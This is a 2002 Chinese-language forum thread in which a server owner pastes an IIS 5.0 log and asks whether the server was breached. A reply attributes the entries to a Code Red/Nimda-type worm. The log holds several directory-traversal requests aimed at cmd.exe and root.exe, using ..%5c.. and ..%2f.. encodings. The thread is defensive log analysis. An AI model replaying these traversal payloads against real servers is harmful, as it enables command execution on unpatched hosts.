可否幫我看一看IIS Log file,有否被人入侵?



贊助商連結


rainfile
2002-05-09, 08:50 AM
謝謝﹗仲有我發現個IIS log 個時間同server個時間唔同,請問有沒有方法解決?


#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-05 04:27:49
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method
cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-05-05 04:27:49 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/root.exe
/c+dir 401 -
2002-05-05 04:27:50 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /MSADC/root.exe
/c+dir 401 -
2002-05-05 04:27:52 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /c/winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:27:53 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /d/winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:27:55 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:27:56 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:27:58 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:27:59 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:01 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..?../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:02 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..?../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:04 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:06 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:07 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:09 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:10 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..%5c../winnt/system32/cmd.exe
/c+dir 401 -
2002-05-05 04:28:12 203.215.177.123 - W3SVC3 XXX 10.144.x.x 80 GET /scripts/..%2f../winnt/system32/cmd.exe
/c+dir 401 -

贊助商連結


sdds
2002-05-10, 01:17 PM
這個不是被駭吧 是中毒了 中紅色警戒 & 納袒 類似的病毒
解毒法可以看一下 本區的頂部